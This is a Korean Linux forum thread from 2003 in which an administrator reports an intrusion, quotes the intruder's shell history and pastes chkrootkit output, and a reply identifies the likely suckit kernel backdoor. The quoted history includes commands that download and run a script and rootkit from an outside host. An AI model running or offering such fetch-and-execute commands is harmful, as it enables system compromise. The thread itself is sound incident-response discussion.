해킹당한것 같습니다. 좀 봐주세요.
글쓴이: hyunuck / 작성시간: 토, 2003/12/06 - 4:20오후
제가 관리하는 시스템에 키디가 들어온것 같은데
uptime uname -a wget http://www.zuka.net/inst sh sh inst cd /lib/security/sk12 ./sk wget http://www.zuka.net/1.tar tar -xvf 1.tar cd fk-0.4 ./install ls
이런짓을 하고 나갔습니다.
http://www.zuka.net/1.tar 은 rootkit 같은데
http://www.zuka.net/inst 은 뭐하는건지 잘 모르겠군요....
root 권한획득에는 실패한것 같은데 기분이 엄청 찝찝합니다.
chkrootkit 돌려봤는데 변경된건 없는것 같습니다만 아래 좀 봐주세요.
그리고 또 뭐 더 살펴볼꺼는 없나요? 흨... 봐주셔서 감사합니다.
ROOTDIR is `/' Checking `amd'... not found Checking `basename'... not infected Checking `biff'... not found Checking `chfn'... not infected Checking `chsh'... not infected Checking `cron'... not infected Checking `date'... not infected Checking `du'... not infected Checking `dirname'... not infected Checking `echo'... not infected Checking `egrep'... not infected Checking `env'... not infected Checking `find'... not infected Checking `fingerd'... not infected Checking `gpm'... not infected Checking `grep'... not infected Checking `hdparm'... not infected Checking `su'... not infected Checking `ifconfig'... not infected Checking `inetd'... not tested Checking `inetdconf'... not found Checking `identd'... not found Checking `init'... not infected Checking `killall'... not infected Checking `ldsopreload'... not infected Checking `login'... not infected Checking `ls'... not infected Checking `lsof'... not infected Checking `mail'... not infected Checking `mingetty'... not infected Checking `netstat'... not infected Checking `named'... not infected Checking `passwd'... not infected Checking `pidof'... not infected Checking `pop2'... not found Checking `pop3'... not found Checking `ps'... not infected Checking `pstree'... not infected Checking `rpcinfo'... not infected Checking `rlogind'... not infected Checking `rshd'... not infected Checking `slogin'... not infected Checking `sendmail'... not infected Checking `sshd'... not infected Checking `syslogd'... not infected Checking `tar'... not infected Checking `tcpd'... not infected Checking `tcpdump'... not infected Checking `top'... not infected Checking `telnetd'... not infected Checking `timed'... not found Checking `traceroute'... not infected Checking `vdir'... not infected Checking `w'... not infected Checking `write'... not infected Checking `aliens'... no suspect files Searching for sniffer's logs, it may take a while... nothing found Searching for HiDrootkit's default dir... nothing found Searching for t0rn's default files and dirs... nothing found Searching for t0rn's v8 defaults... nothing found Searching for Lion Worm default files and dirs... nothing found Searching for RSHA's default files and dir... nothing found Searching for RH-Sharpe's default files... nothing found Searching for Ambient's rootkit (ark) default files and dirs... nothing found Searching for suspicious files and dirs, it may take a while... /usr/lib/perl5/5.8.0/i386-linux-thread-multi/.packlist Searching for LPD Worm files and dirs... nothing found Searching for Ramen Worm files and dirs... nothing found Searching for Maniac files and dirs... nothing found Searching for RK17 files and dirs... nothing found Searching for Ducoci rootkit... nothing found Searching for Adore Worm... nothing found Searching for ShitC Worm... nothing found Searching for Omega Worm... nothing found Searching for Sadmind/IIS Worm... nothing found Searching for MonKit... nothing found Searching for Showtee... nothing found Searching for OpticKit... nothing found Searching for T.R.K... nothing found Searching for Mithra... nothing found Searching for LOC rootkit ... nothing found Searching for Romanian rootkit ... nothing found Searching for HKRK rootkit ... nothing found Searching for Suckit rootkit ... nothing found Searching for Volc rootkit ... nothing found Searching for Gold2 rootkit ... nothing found Searching for TC2 Worm default files and dirs... nothing found Searching for Anonoying rootkit default files and dirs... nothing found Searching for ZK rootkit default files and dirs... nothing found Searching for ShKit rootkit default files and dirs... nothing found Searching for anomalies in shell history files... nothing found Checking `asp'... not infected Checking `bindshell'... not infected Checking `lkm'... nothing detected Checking `rexedcs'... not found Checking `sniffer'... Checking `w55808'... not infected Checking `wted'... nothing deleted Checking `scalper'... not infected Checking `slapper'... not infected Checking `z2'... nothing deleted
Forums:
chkrootkit에 발견되지 않을 수도 있습니다.
제가 보기엔 suckit이라는 kernel backdoor에 당하신것 같습니다.
/sbin/init가 변경되어 부팅시마다 자동으로 적재됩니다.
Searching for Suckit rootkit ... nothing found
이렇게 되어 있긴 하지만, inst의 내용은 suckit이라고 보여지네요.
chkrootkit은 default로 설정이 변경되는 것 (kidz에 의한 아무 수정없이
스크립트를 사용한 경우)에 대해서 상당히 잘 동작하는 걸로 알고 있거든요.
행복하세요 ^_^
댓글 달기